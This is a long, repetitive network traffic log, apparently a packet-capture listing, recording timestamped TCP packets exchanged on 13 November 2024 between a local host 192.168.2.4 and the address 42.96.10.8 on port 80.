                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503118038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503133059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503149033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503165960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503168106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503191948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503221035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503238916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503253937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503262043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503273010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503288984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503293991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503305912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503350973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503387928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503403902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503421068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503433943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503436089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503453970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503458023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503468990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503506899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503525019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503540039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503554106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503580093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503582001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503592968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503597021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503613949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503629923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503634930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503649950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503664970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503665924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503680944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503699064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503716946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503756046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503771067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503786087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503813028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503828049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503844976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503853083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503865004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503879070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503885984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503900051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503931999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503948927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503962994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503979921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503993034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504004002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504009962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504026890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504043102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504070044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504076004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504091978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504132032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504168987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504184008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504199982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504213095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504216909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504234076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504236937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504251957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504255056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504267931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.504287004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554188967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554212093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554230928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554246902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554263115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554291010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554307938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554317951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554335117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554337025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554353952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554371119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554387093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554393053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554419041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554480076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554496050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554512978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554519892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554528952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554546118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554552078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554560900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554577112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554589987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554594040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554610014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554619074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554629087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554642916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554651022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.554694891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.585875034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.585896015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.585911989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.585927963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.585942984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.585946083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.585958958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.585961103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.586009979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594605923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594621897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594646931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594661951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594666004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594681025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594697952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594707966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.594733000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595638990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595666885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595679045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595720053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595752001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595768929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595784903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595796108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.595820904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615137100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615217924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615231991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615256071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615338087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615355015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615370989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615374088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615387917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615411043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615417004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615432978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615449905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615458012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615466118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615482092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615488052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615508080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615524054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615525007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615540028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615555048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615578890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615600109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615637064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615672112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615688086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615725040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615775108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615791082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.615812063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616331100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616378069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616389990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616406918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616431952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616447926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616458893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616492987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616535902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616550922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616566896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616583109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616600037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616609097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616643906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616681099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616697073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616712093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616724014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616740942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616756916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616756916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616774082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616790056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616794109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616807938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616842031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616873026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616887093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616903067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616915941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616918087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616935015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616941929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616951942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616976976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.616992950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617007017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617021084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617037058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617044926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617065907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617072105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617088079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617104053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617110014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617120028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617136002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617137909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617151976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617193937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617208004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617222071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617247105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617247105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617264032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617283106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617346048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617362022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617377043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617391109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617394924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617408037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617417097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617448092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617495060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617507935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617522955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617537975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617553949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617558956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617569923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617583990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617585897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617602110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617614985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617635012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617820978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617847919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617862940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617877960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617892981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617897034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617909908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617919922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617924929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617942095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617952108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617959023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617985964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.617991924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618001938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618016958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618033886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618048906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618050098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618067026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618072033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618093014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618094921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618114948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618129969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618136883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618146896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618163109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618177891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618187904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618204117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618206024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618222952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618236065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618252039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618257999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618268967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618278027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618305922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618307114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618324995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618340015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618355036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618371010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618377924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618388891 CET804973342.96.10.8192.168.2.4
